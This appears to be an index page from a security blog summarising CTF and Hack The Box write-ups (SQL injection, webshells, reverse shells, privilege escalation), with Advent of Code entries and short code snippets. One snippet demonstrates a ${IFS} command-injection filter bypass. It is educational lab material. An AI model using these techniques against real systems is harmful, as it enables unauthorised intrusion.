Last Friday I competed with the Neutrino Cannon CTF team in the COVID-19 CTF created by Threat Simulations and RunCode as a part of DERPCON 2020. I focused much of my efforts on a section named CovidScammers. It was a really interesting challenge that encompassed forensics, reversing, programming, fuzzing, and exploitation. I managed to get a shell on the C2 server just as I had to sign off for the day, so I didn’t complete the next steps that unlocked after that. Still, I really enjoyed the challenge and wanted to show the steps up to that point.
HTB: OpenAdminhtb-openadmin hackthebox ctf nmap gobuster opennetadmin searchsploit password-reuse webshell ssh john sudo gtfobins oscp-like
OpenAdmin provided a straightforward easy box. There’s some enumeration to find an instance of OpenNetAdmin, which has a remote code execution exploit that I’ll use to get a shell as www-data. The database credentials are reused by one of the users. Next I’ll pivot to the second user via an internal website which I can either get code execution on or bypass the login to get an SSH key. Finally, for root, there’s a sudo on nano that allows me to get a root shell using GTFObins.
HTB: SolidStatehackthebox ctf htb-solidstate nmap james pop3 smtp bash-completion ssh rbash credentials directory-traversal cron pspy oscp-like
The biggest trick with SolidState was not focusing on the website but rather moving to a vulnerable James mail server. In fact, if I take advantage of a restricted shell escape, I don’t even need to exploit James, but rather just use the admin interface with default creds to gain access to the various mailboxes, find SSH creds, escape rbash, and continue from there. But I will also show how to exploit James using a directory traversal vulnerability to write a bash completion script and then trigger that with a SSH login. For root, there’s a cron running a writable Python script, which I can add a reverse shell to. In Beyond Root, I’ll look at payloads for the James exploit, both exploring what didn’t work, and improving the OPSEC.
HTB: Controlctf hackthebox htb-control nmap mysql http-header wfuzz sqli injection mysql-file-write hashcat powershell-run-as winpeas registry-win service windows-service powershell oscp-plus htb-nest
Control was a bit painful for someone not comfortable looking deep at Windows objects and permissions. It starts off simply enough, with a website where I’ll have to forge an HTTP header to get into the admin section, and then identify an SQL injection to write a webshell and dump user hashes. I can use the webshell to get a shell, and then one of the cracked hashes to pivot to a different user. From there, I’ll find that users can write the registry keys associated with Services. I’ll construct some PowerShell to find potential services that I can restart, and then modify them to run NetCat to return a shell.
HTB: Ninevehhtb-nineveh hackthebox ctf nmap vhosts gobuster phpinfo bruteforce phpliteadmin sql sqlite searchsploit hydra directory-traversal lfi webshell strings binwalk tar ssh port-knocking knockd chkrootkit pspy oscp-like
There were several parts about Nineveh that don’t fit with what I expect in a modern HTB machine - steg, brute forcing passwords, and port knocking. Still, there were some really neat attacks. I’ll show two ways to get a shell, by writing a webshell via phpLiteAdmin, and by abusing PHPinfo. From there I’ll use my shell to read the knockd config and port knock to open SSH and gain access using the key pair I obtained from the steg image. To get root, I’ll exploit chkrootkit, which is running on a cron.
HTB: Mangohackthebox htb-mango ctf nmap certificate subdomains wfuzz nosql mongo injection nosql-injection python ssh password-reuse jjs gtfobins sudoers oscp-plus oswe-like
Mango’s focus was exploiting a NoSQL document database to bypass an authorization page and to leak database information. Once I had the users and passwords from the database, password reuse allowed me to SSH as one of the users, and then su to the other. From there, I’ll take advantage of a SUID binary associated with Java, jjs. I’ll show both file read and get a shell by writing a public SSH key into root’s authorized keys file.
HTB: Cronoshtb-cronos ctf hackthebox nmap dns nslookup zone-transfer dig gobuster vhosts subdomain laravel searchsploit sqli injection command-injection burp linpeas cron php mysql cve-2018-15133 metasploit oscp-like
Cronos didn’t provide anything too challenging, but did present a good intro to many useful concepts. I’ll enumerate DNS to get the admin subdomain, and then bypass a login form using SQL injection to find another form where I could use command injections to get code execution and a shell. For privesc, I’ll take advantage of a root cron job which executes a file I have write privileges on, allowing me to modify it to get a reverse shell. In Beyond Root, I’ll look at the website and check in on how I was able to do both the SQLi and the command injection, as well as fail to exploit the machine with a Laravel PHP framework deserialization bug, and determine why.
HTB: Traverxechtb-traverxec hackthebox ctf nmap nostromo searchsploit metasploit htpasswd hashcat ssh john gtfobins journalctl oscp-like
Traverxec was a relatively easy box that involved enumerating and exploiting a less popular webserver, Nostromo. I’ll take advantage of an RCE vulnerability to get a shell on the host. I could only find a Metasploit script, but it was a simple HTTP request I could recreate with curl. Then I’ll pivot into the user’s private files based on his use of a web home directory on the server. To get root, I’ll exploit sudo used with journalctl.
HTB: Sniper Beyond Roothackthebox ctf htb-sniper cron scheduled-task persistence powershell startup magic htb-secnotes htb-re
In Sniper, the administrator user is running CHM files that are dropped into c:\docs, and this is the path from the chris user to administrator. I was asked on Twitter how the CHM was executed, so I went back to take a look.
HTB: More Lamehackthebox htb-lame ctf nmap distcc searchsploit cve-2004-2687 cve-2008-0166 ssh rsa suid gtfobins wireshark python oscp-like htb-irked
After I put out a Lame write-up yesterday, it was pointed out that I skipped an access path entirely - distcc. Yet another vulnerable service on this box, which, unlike the Samba exploit, provides a shell as a user, providing the opportunity to look for PrivEsc paths. This box is so old, I’m sure there are a ton of kernel exploits available. I’ll skip those for now, focusing on three paths to root - finding a weak public SSH key, using SUID nmap, and backdoored UnrealIRCd.
HTB: Lamehackthebox htb-lame ctf nmap ftp vsftpd samba searchsploit exploit metasploit oscp-like htb-lacasadepapel
Lame was the first box released on HTB (as far as I can tell), which was before I started playing. It’s a super easy box, easily knocked over with a Metasploit script directly to a root shell. Still, it has some very OSCP-like aspects to it, so I’ll show it with and without Metasploit, and analyze the exploits. It does throw one head-fake with a VSFTPd server that is a vulnerable version, but with the box configured to not allow remote exploitation. I’ll dig into VSFTPd in Beyond Root.
HTB: Registryhtb-registry hackthebox ctf nmap wfuzz subdomain gobuster zcat docker bolt-cms searchsploit api docker-fetch ssh credentials sqlite hashcat webshell firewall tunnel restic cron
Registry provided the chance to play with a private Docker registry that wasn’t protected by anything other than a weak set of credentials. I’ll move past that to get the container and the SSH key and password inside. From there, I’ll exploit an instance of Bolt CMS to pivot to the www-data user. As www-data, I can access the Restic backup agent as root, and exploit that to get both the root flag and a root ssh key.
Jar Files: Modification Cheat Sheetjava reverse-engineering decompile jar recompile. When the challenge ends, I’ll update with some narrative.
HTB: Sniperhackthebox ctf htb-sniper nmap commando gobuster lfi rfi wireshark samba log-poisoning powershell webshell powershell-run-as chm nishang oscp-plus
Sniper involved utilizing a relatively obvious file include vulnerability in a web page to get code execution and then a shell. The first privesc was a common credential reuse issue. The second involved poisoning a .chm file to get code execution as the administrator.
update-alternativeslinux update-alternatives nc java namei bash
Debian Linux (and its derivatives like Ubuntu and Kali) has a system called alternatives that’s designed to manage having different versions of some software, or aliasing different commands to different versions within the system. Most of the time, this is managed by the package management system. When you run apt install x, it may do some of this behind the scenes for you. But there are times when it is really useful to know how to interact with this yourself. For example, I’m currently working on a challenge that requires using an older version of Java to interact with a file. I’ll use update-alternatives to install the new Java version, and then to change which version java, javac, jar, etc. utilize.
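The mechanism described above can be sketched without touching the real system: update-alternatives accepts --altdir, --admindir, and --log to point it at arbitrary directories, so a throwaway temp dir works. The two "java" stubs below are fakes standing in for real JDK binaries (all paths here are made up for illustration, not taken from the post):

```shell
# Build a sandbox with two fake "java" versions
tmp=$(mktemp -d)
mkdir -p "$tmp/alt" "$tmp/admin" "$tmp/bin"
printf '#!/bin/sh\necho java-11\n' > "$tmp/java11"
printf '#!/bin/sh\necho java-8\n'  > "$tmp/java8"
chmod +x "$tmp/java11" "$tmp/java8"

# Wrapper so every call uses the sandbox instead of /etc/alternatives
ua() {
    update-alternatives --altdir "$tmp/alt" --admindir "$tmp/admin" \
        --log "$tmp/log" "$@"
}

# Register both versions; in auto mode the highest priority wins
ua --install "$tmp/bin/java" java "$tmp/java11" 200
ua --install "$tmp/bin/java" java "$tmp/java8" 100
"$tmp/bin/java"    # prints "java-11" (auto mode picks priority 200)

# Pin the older version, as you would to run an old jar
ua --set java "$tmp/java8"
"$tmp/bin/java"    # prints "java-8" (manual mode)
```

The same --install/--set pattern applied to /usr/bin/java (as root, without the sandbox flags) is how you would switch real JDKs.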
HTB: Foresthackthebox ctf htb-forest nmap active-directory dig dns rpc rpcclient as-rep-roast hashcat winrm evil-winrm sharphound smbserver bloodhound dcsync aclpwn wireshark scheduled-task oscp-like htb-active htb-reel htb-sizzle
One of the neat things about HTB is that it exposes Windows concepts unlike any CTF I’d come across before it. Forest is a great example of that. It is a domain controller that allows me to enumerate users over RPC, attack Kerberos with AS-REP Roasting, and use WinRM to get a shell. Then I can take advantage of the permissions and accesses of that user to get DCSync capabilities, allowing me to dump hashes for the administrator user and get a shell as the admin. In Beyond Root, I’ll look at what DCSync looks like on the wire, and look at the automated task cleaning up permissions.
HTB: Postmanhackthebox htb-postman ctf nmap webmin redis ssh john credentials cve-2019-12840 metasploit oscp-like
Postman was a good mix of easy challenges providing a chance to play with Redis and exploit Webmin. I’ll gain initial access by using Redis to write an SSH public key into an authorized_keys file. Then I’ll pivot to Matt by cracking his encrypted SSH key and using the password. That same password provides access to the Webmin instance, which is running as root, and can be exploited to get a shell. In Beyond Root, I’ll look at a Metasploit Redis exploit and why it failed on this box.
HTB: Bankrobberctf htb-bankrobber hackthebox nmap mysql smb gobuster cookies xss csrf sqli injection bof ida chisel python pattern-create phantom-js reverse-engineering oscp-like htb-giddy htb-querier
BankRobber was neat because it required exploiting the same exploit twice. I’ll find a XSS vulnerability that I can use to leak the admin user’s cookie, giving me access to the admin section of the site. From there, I’ll use a SQL injection to leak the source for one of the PHP pages which shows it can provide code execution, but only accepts requests from localhost. I’ll use the same XSS vulnerability to get the admin to send that request from Bankrobber, returning a shell. To privesc to SYSTEM, I’ll find a binary running as SYSTEM and listening only on localhost. I’m not able to grab a copy of the binary as my current user, but I can create a tunnel and poke at it directly. First I’ll brute force a 4-digit pin, and then I’ll discover a simple buffer overflow that allows me to overwrite a string that is the path to an executable that’s later run. I can overwrite that myself to get a shell. In Beyond Root, I’ll look at how the XSS was automated and at the executable now that I have access.
HTB: Scavengerctf hackthebox htb-scavenger nmap whois sqli injection zone-transfer exim cve-2019-10149 vhosts wfuzz dirsearch wpscan mantisbt webshell ir python python-cmd mkfifo-shell forward-shell hydra rootkit ida iptables reverse-engineering htb-stratosphere
Scavenger required a ton of enumeration, and I was able to solve it without ever getting a typical shell. The box is all about enumerating the different sites on the box (and using an SQL injection in whois to get them all), and finding one is hacked and a webshell is left behind. The firewall rules make getting a reverse shell impossible, but I’ll use the RCE to enumerate the box (and build a stateful Python shell in the process, though it’s not necessary). Enumerating will turn up several usernames and passwords, which I’ll use for FTP access to get more creds, the user flag, and a copy of a rootkit that’s running on the box. A combination of finding the rootkit described on a webpage via Googling and reversing to see how it’s changed gives me the ability to trigger any session to root. In Beyond Root, I’ll look more in-depth at the SQLi in the whois server, examine the iptables rules that made getting a reverse shell impossible, and show how to use CVE-2019-10149 against the EXIM mail server to get execution as root as well.
HTB: Zettactf htb-zetta hackthebox nmap ftp-bounce rfc-2428 ipv6 rsync credentials ssh tudu syslog git postgres sqli
Zetta is different right from the start, using FTP Bounce attacks to identify the IPv6 address of the box, and then finding RSync listening on IPv6 only. I’ll use limited RSync access to get the size of a user’s password, and then brute force it to get access to the roy home directory, where I can write my key to the authorized keys file to get SSH access. I’ll escalate to the postgres user with an SQL injection into Syslog, where the box author cleverly uses Git to show the config but not the most recent password. Finally, I’ll recover the password for root using some logic and the postgres user’s password. In Beyond Root, I’ll look at the authentication for the FTP server that allowed any 32 character user with the username as the password, dig into the RSync config, and look at the bits of the Syslog config that were hidden from me.
HTB: Jsonhackthebox htb-json ctf commando nmap deserialization dotnet javascript deobfuscation jsnice gobuster oauth ysoserial.net filezilla chisel ftp dnspy python des crypto juicypotato potato oswe-like htb-arkham
Json involved exploiting a .NET deserialization vulnerability to get initial access, and then going one of three ways to get root.txt. I’ll show each of the three ways I’m aware of to escalate: Connecting to the FileZilla Admin interface and changing the user’s password; reversing a custom application to understand how to decrypt a username and password, which can then be used over the same FTP interface; and JuicyPotato to get a SYSTEM shell. Since this is a Windows host, I’ll work it almost entirely from my Windows Commando VM.
HTB: REhackthebox ctf htb-re nmap vhosts jekyll smbclient smbmap libreoffice office ods macro invoke-obfuscation nishang zipslip winrar cron webshell ghidra xxe responder hashcat evil-winrm winrm chisel tunnel usosvc accesschk service service-hijack diaghub esf mimikatz hashes-org htb-ai htb-hackback htb-helpline
RE was a box I was really excited about, and I was crushed when the final privesc didn’t work on initial deployment. Still, it got patched, and two unintended paths came about as well, and everything turned out ok. I’ll approach this write-up how I expected people to solve it, and call out the alternative paths (and what mistakes on my part allowed them) as well. I’ll upload a malicious ods file to a malware sandbox where it is run as long as it is obfuscated. From there, I’ll abuse a WinRAR ZipSlip vulnerability to write a webshell. Now, as the IIS user, I can access a new folder where Ghidra project files can be dropped to exploit an XXE in Ghidra. There are two unintended paths from IIS to SYSTEM, using the UsoSvc and using ZipSlip with Diaghub, where I then have to get coby’s creds to read root.txt. I’ll show all of these, and look at some of the automation scripts (including what didn’t work on initial deployment) in Beyond Root.
Digging into PSExec with HTB Nesthackthebox ctf htb-nest psexec smb windows scmanager sddl dacl sacl ace icacls
“You have to have administrator to PSExec.” That’s what I’d always heard. Nest released on HTB yesterday, and on release, it had an unintended path where a low-priv user was able to PSExec, providing a shell as SYSTEM. This has now been patched, but I thought it was interesting to see what was configured that allowed this non-admin user to get a shell with PSExec. Given this is a live box, I won’t go into any of the details that still matter, saving that for a write-up in 20ish weeks or so.
HTB: AIhackthebox ctf htb-ai nmap gobuster text2speech flite sqli tomcat jdwp jdb jdwp-shellifier
AI was a really clever box themed after smart speakers like Echo and Google Home. I’ll find a web interface that accepts sound files, and use that to find SQL injection that I have to pass using words. Of course I’ll script the creation of the audio files, and use that to dump credentials from the database that I can use to access the server. For privesc, I’ll find an open Java Debug port on Tomcat running as root, and use that to get a shell.
HTB: Playerhackthebox ctf htb-player nmap vhosts ssh searchsploit wfuzz burp jwt codiad bfac ffmpeg lshell webshell deserialization php lfi escape
Player involved a lot of recon, and pulling together pieces to go down multiple different paths to user and root. I’ll start identifying and enumerating four different virtual hosts. Eventually I’ll find a backup file with PHP source on one, and use it to get access to a private area. From there, I can use a flaw in FFMPEG to leak videos that contain the text contents of various files on Player. I can use that information to get credentials where I can SSH, but only with a very limited shell. However, I can use an SSH exploit to get code execution that provides limited and partial file read, which leads to more credentials. Those credentials are good for a Codiad instance running on another of the virtual hosts, which allows me to get a shell as www-data. There’s a PHP script running as a cron as root that I can exploit either by overwriting a file include, or by writing serialized PHP data. In Beyond Root, I’ll look at two more alternative paths, one jumping right to shell against Codiad, and the other bypassing lshell.
Holiday Hack 2019: KringleCon2ctf sans-holiday-hack
The 2019 SANS Holiday Hack Challenge presented a twisted take on how a villain, the Tooth Fairy, tried to take down Santa and ruin Christmas. It all takes place at the second annual Kringle Con, where the world’s leading security practitioners show up to hear talks and solve puzzles. Hosted at Elf-U, this year’s conference included 14 talks from leaders in information security, as well as 11 terminals / in-game puzzles and 13 objectives to figure out. In solving all of these, the Tooth Fairy’s plot was foiled, and Santa was able to deliver presents on Christmas. As usual, the challenges were interesting and set up in such a way that it was very beginner friendly, with lots of hints and talks to ensure that you learned something while solving. While last year really started the trend of defensive themed challenges, 2019 had a ton of interesting defensive challenges, with hands on with machine learning as well as tools like Splunk and Graylog.
HTB: Bitlabhackthebox ctf htb-bitlab nmap bookmark javascript obfuscation webshell git gitlab docker ping-sweep chisel tunnel psql credentials ssh reverse-engineering ida x64dbg git-hooks reverse-engineering oscp-plus
Bitlab was a box centered around automation of things, even if the series of challenges were each rather unrealistic. It starts with a Gitlab instance where the help link has been changed to give access to javascript encoded credentials. Once logged in, I have access to the codebase for the custom profile pages used in this instance, and there’s automation in place such that when I merge a change into master, it goes live right away. So I can add a webshell and get access to the box. In the database, I’ll find the next user’s credentials for SSH access. For root, I’ll reverse engineer a Windows executable which is executing Putty with credentials, and use those creds to get root. In Beyond Root, I’ll look at an unintended path from www-data to root using git hooks, and explore a call to GetUserNameW that is destined to fail.
HTB: Crafthackthebox ctf htb-craft nmap gogs api wfuzz flask python python-eval git ssh vault-project jwt john jwtcat
Craft was a really well designed medium box, with lots of interesting things to poke at, none of which were too difficult. I’ll find credentials for the API in the Gogs instance, as well as the API source, which allows me to identify a vulnerability in the API that gives code execution. Then I’ll use the shell on the API container to find creds that allow me access to private repos back on Gogs, which include an SSH key. With SSH access to the host, I’ll target the vault project software to get SSH access as root. In Beyond Root, I’ll look at the JWT, and my failed attempts to crack the secret.
Hackvent 2019 - leetctf hackvent arduino hex-file avr-simulator binascii python burp php john ghidra arm ioctl reverse-engineering
There were only three leet challenges, but they were not trivial, and they were IoT focused. First, I'll reverse an Arduino binary from its hex file. Then, there's a web hacking challenge that quickly morphs into a crypto challenge, which I can solve by reimplementing the leaked PRNG from the IDA Pro disassembly to generate a valid password. Finally, there's firmware for a Broadcom wireless chip, where I'll need to find the hooked ioctl function and pull the flag from it.
Hackvent 2019 - Hardctf hackvent websocket mqtt cve-2017-7650 x32dbg patching unicode php sql mach-o deb ghidra salsa20 crypto emojicode ps4 ecc reverse-engineering
The hard levels of Hackvent continued with more web hacking, reverse engineering, crypto, and an esoteric programming language. In the reversing challenges, there was not only an iPhone Debian package, but also a PS4 update file.
Hackvent 2019 - Mediumctf hackvent crypto sql credit-cards rule-30 gimp strace ltrace jwt python vb x32dbg ghidra jsf perl obfuscation deparse reverse-engineering
The medium levels brought the first reverse engineering challenges, the first web hacking challenges, some image manipulation, and of course, some obfuscated Perl.
Hackvent 2019 - Easyctf hackvent forensics stereolithography stl clara-io aztec-code hodor ahk autohotkey steganography python pil bacon crypto stegsnow base58
Hackvent is a fun CTF, offering challenges that start off quite easy and build to much harder over the course of 24 days, with bonus points for submitting the flag within the first 24 hours for each challenge. This was the first year I made it past day 12, and I was excited to finish all the challenges with all time bonuses! I’ll break the solutions into four parts. The first is the easy challenges, days 1-7, which provided some basic image forensics, some interesting file types, an esoteric programming language, and two hidden flags.
Advent of Code 2019: Day 14ctf advent-of-code python defaultdict
Day 14 is all about stacking requirements and then working them to understand the inputs required to get the output desired. I’ll need to organize my list of reactions in such a way that I can work back from the desired end output to how much ore is required to get there.
HTB: Smasher2htb-smasher2 hackthebox ctf exploit auth-bypass logic-error python reference-counting kernal-driver mmap reverse-engineering
Like the first Smasher, Smasher2 was focused on exploitation. However, this one didn't have a buffer overflow or what I typically think of as binary exploitation. It starts with finding a vulnerability in a compiled Python module (written in C) to get access to an API key. Then I'll have to bypass a WAF to use that API to get execution and then a shell on Smasher2. For privesc, I'll need to exploit a kernel driver to get a root shell.
Advent of Code 2019: Day 13ctf advent-of-code python intcode-computer defaultdict
Continuing with the computer, now I’m using it to power an arcade game. I’ll use the given intcodes to run the game, and I’m responsible for moving the joystick via input to the game. This challenge was awesome. I made a video of the game running in my terminal, which wasn’t necessary, but turned out pretty good.
Advent of Code 2019: Day 12ctf advent-of-code python
Day 12 asks me to look at moons and calculate their positions based on a simplified gravity between them. In the first part, I'll run the system for 1000 steps and return a calculation (“energy”) based on each moon's position and velocity at that point. In the second part, I'll have to find when the positions repeat, which I can do by recognizing that the three axes are independent of each other, and that I can find the cycle time for each axis, and then find the least common multiple of them to get when all three are in order.
Advent of Code 2019: Day 11ctf advent-of-code python intcode-computer defaultdict
Continuing with the computer, now I’m using it to power a robot. My robot will walk around, reading the current color, submitting that to the program, and getting back the color to paint the current square and instructions for where to move next.
Advent of Code 2019: Day 10ctf advent-of-code python
This challenge gives me a map of asteroids. I’ll need to play with different ways to find which ones are directly in the path of others, first to see which asteroids can see the most others, and then to destroy them one by one with a laser.
Advent of Code 2019: Day 9ctf advent-of-code python intcode-computer defaultdict
More computer work in day 9, this time adding what is kind of a stack pointer and an opcode to adjust that pointer. Now I can add a relative address mode, getting positions relative to the stack pointer.
Advent of Code 2019: Day 8ctf advent-of-code python
After spending hours on day 7, I finished day 8 in about 15 minutes. It was simply reading in a series of numbers which represented pixels in the various layers of an image. In part one I'll break the pixels into layers and evaluate each one. In part two, I'll actually create the image.
Advent of Code 2019: Day 7ctf advent-of-code python intcode-computer
The computer is back again, and this time, I'm chaining it and using it as an amplifier. In each part, I'll find the way to get maximum thrust from five amplifiers, given that each can take one of five given phases. In part two, there's a loop of amplification.
HTB: Wallhackthebox ctf htb-wall nmap gobuster hydra centreon cve-2019-13024 waf filter python uncompyle screen modsecurity htaccess htb-flujab
Wall presented a series of challenges wrapped around two public exploits. The first exploit was a CVE in Centreon software. But to find it, I had to take advantage of a misconfigured webserver that only requests authentication on GET requests, allowing POST requests to proceed, which leads to the path to the Centreon install. Next, I'll use the public exploit, but it fails because there's a WAF blocking requests with certain keywords. I'll probe to identify the blocked words, which include the space character, and use the Linux environment variable ${IFS} instead of spaces to get command injection. Once I have that, I can get a shell on the box. There's a compiled Python file in the user's home directory, which I can decompile to find the password for the second user. From either of these users, I can exploit SUID screen to get a root shell. In Beyond Root, I'll look at the webserver configuration, the WAF, improve the exploit script, and look at some trolls the author left around.
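The ${IFS} trick can be demonstrated locally (a hypothetical sketch, not the exploit from the box, and it assumes a POSIX /bin/sh is available): the shell expands ${IFS} to whitespace, which then acts as a word separator, so a payload with no literal spaces still runs a command with arguments.

```python
import subprocess

# A WAF that blocks the space character can often be bypassed with ${IFS}:
# the shell expands it to its whitespace value, and field splitting then
# treats that expansion as a separator between words.
payload = "echo${IFS}injected"
assert " " not in payload  # would pass a space-blocking filter

out = subprocess.run(["/bin/sh", "-c", payload],
                     capture_output=True, text=True)
print(out.stdout.strip())
```

The same substitution works anywhere the injected string reaches a shell, which is why space-only blocklists are a weak mitigation for command injection.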
Advent of Code 2019: Day 6ctf advent-of-code python recursion defaultdict
This was a fun challenge, because it seemed really hard at first, but once I figured out how to think about it, it was quite simple. I'm given a set of pairings, each of which contains two objects, the second orbits around the first. I'll play with counting the number of orbits going on, as well as working a path through the orbits. This was the first time I brought out recursive programming this year, and it really fit well.
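The recursive counting can be sketched like this (my own illustration against the puzzle's published example, not the post's code): each object's orbit count is one more than its parent's, and the answer is the sum over all objects.

```python
def total_orbits(pairs):
    """pairs like 'COM)B' mean B orbits COM; count direct + indirect orbits."""
    parent = {}
    for line in pairs:
        inner, outer = line.split(")")
        parent[outer] = inner

    def depth(obj):
        # Number of objects this object orbits, directly or indirectly.
        if obj not in parent:
            return 0
        return 1 + depth(parent[obj])

    return sum(depth(obj) for obj in parent)

example = ["COM)B", "B)C", "C)D", "D)E", "E)F", "B)G",
           "G)H", "D)I", "E)J", "J)K", "K)L"]
print(total_orbits(example))
```

For the puzzle's example map this yields 42, matching the documented answer.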
Advent of Code 2019: Day 5ctf advent-of-code python intcode-computer
Today I’m tasked with building on the simple computer I built in day 2. I’ll add new instructions for input / output and comparisons / branching. I’ll also get parameter modes, so in addition to reading values from other positions, I can now handle constants (known in computer architecture as immediates).
Advent of Code 2019: Day 4ctf advent-of-code python
I solved day 4 much faster than day 3, probably because it moved away from spatial reasoning and just into input validation. I'm given a range of 6-digit numbers, and asked to pick ones that meet certain criteria.
Advent of Code 2019: Day 3ctf advent-of-code python
I always start to struggle when AOC moves into spatial challenges, and this is where the code starts to get a bit ugly. In this challenge, I have to think about two wires moving across a coordinate plane, and look for positions where they intersect. Then I'll score each intersection, first by Manhattan distance to the origin, and then by total number of steps from the origin along both wires, and return the minimum.
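One way to keep this clean (a sketch of the general approach, not the post's code) is to trace each wire into a dict mapping every visited point to the fewest steps taken to reach it; set intersection on the keys then gives the crossings for both scoring schemes.

```python
def trace(path):
    """Map each point a wire visits to the fewest steps taken to reach it."""
    deltas = {"U": (0, 1), "D": (0, -1), "L": (-1, 0), "R": (1, 0)}
    x = y = steps = 0
    visited = {}
    for move in path.split(","):
        dx, dy = deltas[move[0]]
        for _ in range(int(move[1:])):
            x, y, steps = x + dx, y + dy, steps + 1
            visited.setdefault((x, y), steps)
    return visited

def closest_crossing(a, b):
    # Part one: minimum Manhattan distance from the origin to an intersection.
    crossings = trace(a).keys() & trace(b).keys()
    return min(abs(x) + abs(y) for x, y in crossings)

def fewest_steps(a, b):
    # Part two: minimum combined steps along both wires to an intersection.
    w1, w2 = trace(a), trace(b)
    return min(w1[p] + w2[p] for p in w1.keys() & w2.keys())
```

On the puzzle's example pair ("R8,U5,L5,D3" and "U7,R6,D4,L4") these return 6 and 30, matching the documented answers.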
Advent of Code 2019: Day 2ctf advent-of-code python intcode-computer
This puzzle is to implement a little computer with three op codes, add, multiply, and finish. In the first part, I’m given two starting register values, 12 and 2. In the second part, I need to brute force those values to find a given target output.
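The whole machine at this stage fits in a few lines (a minimal sketch, not the post's implementation, which grows in later days):

```python
def run_intcode(program):
    """Run the three-opcode machine: 1 = add, 2 = multiply, 99 = halt."""
    mem = program[:]          # work on a copy so callers can reuse the program
    ip = 0
    while mem[ip] != 99:
        op, a, b, dst = mem[ip:ip + 4]
        if op == 1:
            mem[dst] = mem[a] + mem[b]
        elif op == 2:
            mem[dst] = mem[a] * mem[b]
        else:
            raise ValueError(f"unknown opcode {op}")
        ip += 4
    return mem
```

The puzzle's example program [1,9,10,3,2,3,11,0,99,30,40,50] halts with 3500 in position 0; brute-forcing part two is just looping the two starting register values over 0-99 and re-running.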
Advent of Code 2019: Day 1ctf advent-of-code python
This puzzle was basically reading a list of numbers, performing some basic arithmetic, and summing the results. For part two, there's a twist in that I'll need to do that same math on the results, and add them as long as they are greater than 0.
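The arithmetic and the part-two twist can be sketched as (my own illustration, checked against the puzzle's published examples):

```python
def fuel(mass):
    # Part one: fuel is mass divided by three, rounded down, minus two.
    return mass // 3 - 2

def total_fuel(mass):
    # Part two: fuel itself needs fuel; keep adding until the amount
    # required drops to zero or below.
    total = 0
    f = fuel(mass)
    while f > 0:
        total += f
        f = fuel(f)
    return total

print(fuel(12), total_fuel(100756))
```

The overall answer is then just the sum of total_fuel over every module mass in the input.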
HTB: Heistctf hackthebox htb-heist nmap cisco john cisco-type-7 smbclient smbmap crackmapexec rpcclient ipc lookupsids evil-winrm powershell docker firefox procdump out-minidump mimikittenz credentials
Heist brought new concepts I hadn't seen on HTB before, yet kept to the easy difficulty. I'll start by finding a Cisco config on the website, which has some usernames and password hashes. After recovering the passwords, I'll find that one works to get RPC access, which I'll use to find more usernames. One of those usernames with one of the original passwords works to get a WinRM session on Heist. From there, I'll notice that Firefox is running, and dump the process memory to find the password for the original website, which is also the administrator password for the box.
LD_PRELOAD Rootkit on Chainsawhtb-chainsaw ctf hackthebox rootkit ldpreload ida nm strace reverse-engineering ghidra
HTB: Chainsawhtb-chainsaw ctf hackthebox nmap ftp solididy python web3 remix command-injection injection ipfs ssh email john path-hijack suid bmap df debugfs ida ghidra pyinstaller reverse-engineering
Chainsaw was centered around blockchain and smart contracts, with a bit of InterPlanetary File System thrown in. I'll get the details of a Solidity smart contract over an open FTP server, and find command injection in it to get a shell. I'll find an SSH key for the bobby user in IPFS files. bobby has access to a SUID binary that I can interact with in two ways to get a root shell. But even as root, the flag is hidden, so I'll have to dig into the slack space around root.txt to find the flag. In Beyond Root, I'll look at the ChainsawClub binaries to see how they apply the same Web3 techniques I used to get into the box in the first place.
HTB: Networkedctf htb-networked hackthebox nmap apache dirsearch php upload webshell filter command-injection sudo ifcfg oscp-like
Networked involved abusing an Apache misconfiguration that allowed me to upload an image containing a webshell with a double extension. With that, I got a shell as www-data, and then did two privescs. The first abused command injection into a script that was running to clean up the uploads directory. Then I used access to an ifcfg script to get command execution as root. In Beyond Root, I’ll look a bit more at that Apache configuration.
HTB: Jarvisctf htb-jarvis hackthebox nmap waf gobuster sqli injection sqlmap phpmyadmin cve-2018-12613 python systemctl service gtfobins command-injection oscp-like
Jarvis provided three steps that were all relatively basic. First, there's a SQL injection with a WAF that breaks sqlmap, at least in its default configuration. Then there's a command injection into a Python script. And finally there's creating a malicious service. In Beyond Root, I'll look at the WAF and the cleanup script.
HTB: Haystackhackthebox ctf htb-haystack gobuster steganography elasticsearch ssh kibana cve-2018-17246 javascript lfi logstash herokuapp
Haystack wasn't a realistic pentesting box, but it did provide insight into tools that are common on the blue side of things with the Elastic Stack. I'll find a hint in an image on a webpage, and use that to find credentials in an Elasticsearch instance. Those creds allow SSH access to Haystack, and access to a local Kibana instance. I'll use a CVE against Kibana to get execution as kibana. From there, I have access to the Logstash config, which is misconfigured to allow execution as root via a properly crafted log entry.
HTB: Safehtb-safe ctf hackthebox rop pwntools bof python exploit keepass kpcli john htb-redcross htb-ellingson
Safe was two steps - a relatively simple ROP, followed by cracking a Keepass password database. Personally I don’t believe binary exploitation belongs in a 20-point box, but it is what it is. I’ll show three different ROP strategies to get a shell.
HTB: Ellingsonhtb-ellingson hackthebox ctf nmap werkzeug python flask debugger ssh bash hashcat credentials bof rop pwntools aslr gdb peda ret2libc checksec pattern-create onegadget cron htb-october htb-redcross
Ellingson was a really solid hard box. I'll start with ssh and http open, and find that they've left the Python debugger running on the webpage, giving me the opportunity to execute commands. I'll use that access to write my ssh key to the authorized_keys file, and get a shell as hal. I'll find that hal has access to the shadow.bak file, and from there, I can break margo's password. Once sshed in as margo, I will find a suid binary that I can overflow to get a root shell. In Beyond Root, I'll explore two cronjobs. The first breaks the privesc from hal to margo, resetting the permissions on the shadow.bak file to a safe configuration. The second looks like a hint that was disabled, or maybe forgotten.
HTB: Writeuphtb-writeup ctf hackthebox nmap cmsms sqli credentials injection
Writeup was a great easy box. Neither of the steps were hard, but both were interesting. To get an initial shell, I’ll exploit a blind SQLI vulnerability in CMS Made Simple to get credentials, which I can use to log in with SSH. From there, I’ll abuse access to the staff group to write code to a path that’s running when someone SSHes into the box, and SSH in to trigger it. In Beyond Root, I’ll look at other ways to try to hijack the root process.
Flare-On 2019: woprflare-on ctf flare-on-wopr python pyinstaller python-exe-unpacker uncompyle pdb exe z3 reverse-engineering
wopr was like an onion - the layers kept peeling back revealing more layers. I’m given an exe which was created by PyInstaller, which I’ll unpack to get to the Python code. That code has a layer of unpacking based on a binary implementation of tabs and spaces in the doc strings. Once I get to the next layer, I need to calculate the hash of the text segment for the currently running binary, and use that as a key to some equations. Using a solver to solve the system, I can find the input necessary to return the flag.
